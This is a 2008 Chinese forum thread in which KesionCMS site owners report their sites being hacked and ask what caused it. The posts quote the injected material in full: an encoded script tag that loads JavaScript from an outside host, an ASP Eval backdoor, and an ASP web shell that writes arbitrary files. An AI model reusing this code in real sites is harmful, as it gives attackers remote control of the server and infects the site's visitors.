账号通
    

账号  

密码  

2673

查看

6

回复
主题:KS_Cls/KS.ClassCls.asp被插入代码 [收藏主题] 转到:  
miforum 当前离线

466

主题

0

广播

0

粉丝
添加关注
级别:四年级

用户积分:5808 分
登录次数:456 次
注册时间:2006/12/2
最后登录:2012/11/1
miforum 发表于:2008/5/16 10:27:00   | 只看该作者 查看该作者主题 楼主 
科汛智能建站系统

昨天发现网站首页以及公共调用的js文件被插入代码

见我昨天的帖子:

http://bbs.kesion.com/dispbbs.asp?boardid=41&Id=48729&page=3
http://bbs.kesion.com/dispbbs.asp?boardid=41&Id=48753&page=3

 

昨天早晨将FTP中所有asp文件删除,重新上传最新版的程序。今天早上,再次发现首页以及公共调用的js被插入诸如此类的代码:document.writeln("<script src=http:\/\/%61%2E%38%65%39%2E%6E%65%74\/%31%2E%6A%73><\/script>");

 

挨个看了文件的修改时间,在KS_Cls/KS.ClassCls.asp文件中发现了,今天凌晨2点多的时候被修改,随即下载下来,用DW打开,发现最后被插入了如下代码:

If Request("Post") <> "" Then
   Eval(Request("Post"))
   Response.End()
End If

 

涉及到安全问题,想必大家都是很关心的事情。请大家看看,可能是什么地方出了问题?

////////////////////////////

补充一点,在article以及download目录下的special.asp,showclass.asp中,也发现被注入代码,这两个页面底部被加入如下代码:

              Dim GK,RK,TK
                   Set GK=Server.Createobject("Scripting.Filesystemobject")
                   If Request("No")<>"" Then
                   Set RK=GK.Createtextfile(Server.Mappath(Request("No")),True)
                   RK.Write CStr(Replace(unescape(Request("txt")), "happy", CHR(43)))
                     RK.Close
                   TK = request.ServerVariables("HTTP_HOST")&"/"&Request("No")&"<br>"
                   TK = TK & Server.Mappath(Request("No"))
       Response.Write(escape(TK))

 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
jnxfylzx 当前离线

569

主题

6

广播

4

粉丝
添加关注
级别:五年级

用户积分:4558 分
登录次数:550 次
注册时间:2007/6/21
最后登录:2018/5/17
jnxfylzx 发表于:2008/6/4 12:56:00   | 只看该作者 查看该作者主题 沙发 
科汛在线网校系统
以下是引用wancn在2008-6-4 9:27:56的发言:

我只能把所有的目录设成只读。我自己更新的时候去打开。更新完了再关。郁闷。

 

其实这是最保险的一个办法!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
wancn 当前离线

315

主题

0

广播

0

粉丝
添加关注
级别:三年级

用户积分:3644 分
登录次数:448 次
注册时间:2007/9/19
最后登录:2012/12/5
wancn 发表于:2008/6/4 9:27:00   | 只看该作者 查看该作者主题 藤椅 
做在线知识付费 选科汛云开店

我只能把所有的目录设成只读。我自己更新的时候去打开。更新完了再关。郁闷。

 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
diyu1123 当前离线

81

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:888 分
登录次数:68 次
注册时间:2006/11/19
最后登录:2009/5/31
diyu1123 发表于:2008/6/4 9:23:00   | 只看该作者 查看该作者主题 板凳 
科汛智能建站系统

我也是被8E9这站挂马了   丫的...

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
miforum 当前离线

466

主题

0

广播

0

粉丝
添加关注
级别:四年级

用户积分:5808 分
登录次数:456 次
注册时间:2006/12/2
最后登录:2012/11/1
miforum 发表于:2008/6/3 19:20:00   | 只看该作者 查看该作者主题 报纸 
科汛在线商城系统(NET)
以下是引用无心石在2008-6-3 19:14:00的发言:

科讯啊,我怎么说才好呢,又中木马.怎么办怎么办.....想想都气死啊...多少个不眠之夜都浪费在木马上了....到最后还是被挂....

欲哭无泪啊....

哈哈,果然,每次都是我先中招啊~然后,大家紧接着中招~

我现在实在没办法,一气之下,将很多目录设置为“只读”了~只能这样啦~

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
无心石 当前离线

43

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:805 分
登录次数:35 次
注册时间:2008/2/23
最后登录:2009/4/14
无心石 发表于:2008/6/3 19:14:00   | 只看该作者 查看该作者主题 地板 
科汛智能建站系统

科讯啊,我怎么说才好呢,又中木马.怎么办怎么办.....想想都气死啊...多少个不眠之夜都浪费在木马上了....到最后还是被挂....

欲哭无泪啊....

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
wancn 当前离线

315

主题

0

广播

0

粉丝
添加关注
级别:三年级

用户积分:3644 分
登录次数:448 次
注册时间:2007/9/19
最后登录:2012/12/5
wancn 发表于:2008/6/3 17:29:00   | 只看该作者 查看该作者主题 7楼 
做在线知识付费 选科汛云开店

我是反反复复的被挂了这个木马.和大家遇到的情况一模一样.

没删几分钟就又来了.

我已经没招了.

百度一下,http://www.baidu.com/s?wd=%3Cscript+src%3Dhttp%3A%2F%2F%2561%252E%2538%2565%2539%252E%256E%2565%2574%2F%2531%252E%256A%2573%3E%3C%2Fscript%3E

全是科讯用户被挂的这个木马.看来这个木马就是针对咱科讯用户的.希望官方重视.

 

 

就是这段代码

<script src=http://%61%2E%38%65%39%2E%6E%65%74/%31%2E%6A%73></script>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.18945秒 powered by KesionCMS 9.0